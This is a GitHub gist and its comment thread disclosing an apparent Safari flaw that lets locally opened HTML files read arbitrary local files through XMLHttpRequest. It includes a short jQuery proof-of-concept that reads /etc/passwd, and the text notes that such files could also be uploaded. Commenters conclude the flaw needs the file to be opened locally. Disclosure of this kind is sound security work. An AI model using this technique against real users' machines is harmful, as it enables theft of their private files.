Last active
August 29, 2015 14:17
-
-
Save rongarret/d8987c9cd57bd768e1de to your computer and use it in GitHub Desktop.
Safari FILE: scheme security hole
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| It appears that Safari does not enforce any kind of access | |
| restrictions for XMLHTTPRequests on FILE: scheme URLs. As a | |
| result, any HTML file on the local file system that is opened in | |
| Safari can read any file that the user has access to (and, of | |
| course, it can upload those files too). Here's a little | |
| proof-of-concept. Copy and paste this into a local HTML file and | |
| open it in Safari. It will display the contents of /etc/passwd. | |
| <script src=https://code.jquery.com/jquery-2.1.3.min.js></script> | |
| <script> | |
| $.ajax({url: '/etc/passwd'}).done(function (s) { | |
| $('body').html('<pre>' + s + '</pre>'); | |
| }); | |
| </script> | |
| Tested on Safari 7.1.4. FF and Chrome do not appear to have this problem. | |
| UPDATE: Turns out this is a known problem: | |
| https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format |
I dunno, this seems pretty bad to me. Why do you think it's not?
@rongarret I think @chesleybrown thought that the file could be hosted on a website and display local files. It needs to be opened locally for it to be able to read local files.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Ah, now that's not nearly as bad as I had originally thought. I was losing my mind there for a few minutes thinking "No way... no way is it that simple". lol